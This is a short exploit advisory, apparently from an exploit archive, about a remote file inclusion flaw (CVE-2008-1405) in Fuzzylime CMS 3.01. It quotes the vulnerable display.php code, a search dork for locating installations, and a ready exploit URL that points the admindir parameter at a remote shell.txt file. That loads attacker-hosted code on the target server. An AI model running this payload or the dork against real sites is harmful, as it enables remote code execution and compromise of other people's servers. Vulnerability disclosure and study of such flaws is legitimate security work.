Fuzzylime CMS 3.01 - 'admindir' Remote File Inclusion



EKU-ID: 13206 CVE: OSVDB-43223;CVE-2008-1405 OSVDB-ID:
Author: irk4z Published: 2008-03-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


.-----------------------------------------------------------------------------.
|  vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability           |
|  download: http://cms.fuzzylime.co.uk/                                      |
|  dork: "powered by fuzzylime"                                               |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: cOndemned, str0ke, wacky                                        |
'-----------------------------------------------------------------------------'

# code:

  /code/display.php:
  ...
1    <?
2    $s = $_GET[s];
3    $p = $_GET[p];
4    $s = str_replace("../", "", $s);
5    $p = str_replace("../", "", $p);
6    if(empty($s)) $s = "front";
7    if(empty($p)) $p = "index";
8    $curs = $s;
9    $curp = $p;
10
11   include "code/settings.inc.php";
12   include "${admindir}/languages/english.inc.php";
 ...

 line 11: ./code/code/settings.inc.php not exists so $admindir is empty :D:D

# exploit:

 http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?

# milw0rm.com [2008-03-14]